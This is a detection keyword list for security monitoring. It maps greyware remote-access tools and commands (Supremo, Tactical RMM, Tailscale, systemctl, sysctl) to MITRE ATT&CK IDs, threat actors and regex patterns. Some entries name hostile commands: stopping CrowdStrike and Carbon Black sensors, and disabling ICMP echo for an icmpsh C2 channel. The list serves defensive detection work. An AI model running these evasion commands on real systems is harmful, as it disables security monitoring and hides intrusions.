"*\SOFTWARE\Supremo\*",".{0,1000}\\SOFTWARE\\Supremo\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" 
"*\Software\Supremo\Printer\*",".{0,1000}\\Software\\Supremo\\Printer\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\WOW6432Node\Supremo\*",".{0,1000}\\SOFTWARE\\WOW6432Node\\Supremo\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\Supremo Remote Printer\*",".{0,1000}\\Supremo\sRemote\sPrinter\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Supremo.exe*",".{0,1000}\\Supremo\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SUPREMO.EXE-*.pf*",".{0,1000}\\SUPREMO\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Supremo_Client_2*",".{0,1000}\\Supremo_Client_2.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A" 
"*\Supremo_Helper_2*",".{0,1000}\\Supremo_Helper_2.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A" "*\Supremo_Service*",".{0,1000}\\Supremo_Service.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A" "*\SupremoHelper.exe*",".{0,1000}\\SupremoHelper\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SupremoRemoteDesktop\*",".{0,1000}\\SupremoRemoteDesktop\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Temp\SupremoRemoteDesktop*",".{0,1000}\\Temp\\SupremoRemoteDesktop.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*application/x-supremo*",".{0,1000}application\/x\-supremo.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*HKCR\supremo\shell\*",".{0,1000}HKCR\\supremo\\shell\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*supremo remote control*",".{0,1000}supremo\sremote\scontrol.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry value","10","10","N/A","N/A","N/A","N/A" "*Supremo.00.Client.log*",".{0,1000}Supremo\.00\.Client\.log.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Supremo.00.FileTransfer.log*",".{0,1000}Supremo\.00\.FileTransfer\.log.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Supremo.exe *",".{0,1000}Supremo\.exe\s.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*supremogw*.nanosystems.it*",".{0,1000}supremogw.{0,1000}\.nanosystems\.it.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","1","N/A","agent network connection 
","10","10","N/A","N/A","N/A","N/A" "*supremohelper.exe*",".{0,1000}supremohelper\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SupremoRemoteDesktop\History.txt*",".{0,1000}SupremoRemoteDesktop\\History\.txt.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SupremoService.00.Service.log*",".{0,1000}SupremoService\.00\.Service\.log.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SupremoService.exe*",".{0,1000}SupremoService\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SupremoSystem.exe*",".{0,1000}SupremoSystem\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*nhnfcgpcbfclhfafjlooihdfghaeinfc*",".{0,1000}nhnfcgpcbfclhfafjlooihdfghaeinfc.{0,1000}","greyware_tool_keyword","Surf VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*iocnglnmfkgfedpcemdflhkchokkfeii*",".{0,1000}iocnglnmfkgfedpcemdflhkchokkfeii.{0,1000}","greyware_tool_keyword","sVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*sysctl -w net.ipv4.icmp_echo_ignore_all=1*",".{0,1000}sysctl\s\-w\snet\.ipv4\.icmp_echo_ignore_all\=1.{0,1000}","greyware_tool_keyword","sysctl","Disable echo reply for icmpsh C2","T1040 - T1095 - T1090.001","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","0","N/A","N/A","4","10","1548","415","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" "*systemctl disable cbdaemon*",".{0,1000}systemctl\sdisable\scbdaemon.{0,1000}","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*systemctl disable falcon-sensor.service*",".{0,1000}systemctl\sdisable\sfalcon\-sensor\.service.{0,1000}","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*systemctl stop cbdaemon*",".{0,1000}systemctl\sstop\scbdaemon.{0,1000}","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*systemctl stop falcon-sensor.service*",".{0,1000}systemctl\sstop\sfalcon\-sensor\.service.{0,1000}","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*cmd /c systeminfo*",".{0,1000}cmd\s\/c\ssysteminfo.{0,1000}","greyware_tool_keyword","systeminfo","gathering details about the local system","T1082 - T1012 - T1033","TA0007 - TA0002","N/A","N/A","Discovery","https://thedfirreport.com/2024/08/26/blacksuit-ransomware/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*cmd.exe /c systeminfo*",".{0,1000}cmd\.exe\s\/c\ssysteminfo.{0,1000}","greyware_tool_keyword","systeminfo","gathering details about the local system","T1082 - T1012 - T1033","TA0007 - TA0002","N/A","N/A","Discovery","https://thedfirreport.com/2024/08/26/blacksuit-ransomware/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "* rmm-installer.ps1*",".{0,1000}\srmm\-installer\.ps1.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - 
T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "* tacticalrmm.exe*",".{0,1000}\stacticalrmm\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/amidaware/rmmagent/releases/download/*",".{0,1000}\/amidaware\/rmmagent\/releases\/download\/.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/nats-rmm.conf*",".{0,1000}\/nats\-rmm\.conf.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/rmm/api/tacticalrmm/*",".{0,1000}\/rmm\/api\/tacticalrmm\/.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/rmm-installer.ps1*",".{0,1000}\/rmm\-installer\.ps1.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - 
T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/tacticalagent.log*",".{0,1000}\/tacticalagent\.log.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/tacticalagent-v*-*.exe*",".{0,1000}\/tacticalagent\-v.{0,1000}\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/tacticalagent-v*-linux-arm.exe*",".{0,1000}\/tacticalagent\-v.{0,1000}\-linux\-arm\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/tacticalagent-v*-windows-amd64.exe*",".{0,1000}\/tacticalagent\-v.{0,1000}\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" 
"*/tacticalrmm.exe*",".{0,1000}\/tacticalrmm\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/tacticalrmm.git*",".{0,1000}\/tacticalrmm\.git.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/tacticalrmm/master/install.sh*",".{0,1000}\/tacticalrmm\/master\/install\.sh.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/tacticalrmm/releases/latest*",".{0,1000}\/tacticalrmm\/releases\/latest.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*/tacticalrmm-web.git*",".{0,1000}\/tacticalrmm\-web\.git.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered 
Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*\InventoryApplicationFile\tacticalagent-v2*",".{0,1000}\\InventoryApplicationFile\\tacticalagent\-v2.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","registry","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*\Program Files\TacticalAgent\*",".{0,1000}\\Program\sFiles\\TacticalAgent\\.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*\ProgramData\TacticalRMM\*",".{0,1000}\\ProgramData\\TacticalRMM\\.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*\rmm-client-site-server.exe*",".{0,1000}\\rmm\-client\-site\-server\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*\rmm-client-site-server.exe*",".{0,1000}\\rmm\-client\-site\-server\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management 
tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*\rmm-installer.ps1*",".{0,1000}\\rmm\-installer\.ps1.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*\tacticalagent-v*-linux-arm.exe*",".{0,1000}\\tacticalagent\-v.{0,1000}\-linux\-arm\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*\tacticalagent-v*-windows-amd64.exe*",".{0,1000}\\tacticalagent\-v.{0,1000}\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*\tacticalrmm.exe*",".{0,1000}\\tacticalrmm\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" 
"*\tacticalrmm\*",".{0,1000}\\tacticalrmm\\.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*amidaware/tacticalrmm*",".{0,1000}amidaware\/tacticalrmm.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*https://*.tacticalrmm.com/*",".{0,1000}https\:\/\/.{0,1000}\.tacticalrmm\.com\/.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*net stop tacticalrmm*",".{0,1000}net\sstop\stacticalrmm.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*RMM.WebRemote.exe*",".{0,1000}RMM\.WebRemote\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" 
"*SOFTWARE\TacticalRMM*",".{0,1000}SOFTWARE\\TacticalRMM.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","registry","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*su - tactical*",".{0,1000}su\s\-\stactical.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*sudo -s /bin/bash tactical*",".{0,1000}sudo\s\-s\s\/bin\/bash\stactical.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*systemctl * rmm.service*",".{0,1000}systemctl\s.{0,1000}\srmm\.service.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*Tactical RMM Agent*",".{0,1000}Tactical\sRMM\sAgent.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered 
Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","registry","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*tacticalrmm.utils*",".{0,1000}tacticalrmm\.utils.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "*tacticalrmm-develop*",".{0,1000}tacticalrmm\-develop.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z" "* install tailscale*",".{0,1000}\sinstall\stailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "* net-vpn/tailscale*",".{0,1000}\snet\-vpn\/tailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "* tailscale.exe*",".{0,1000}\stailscale\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote 
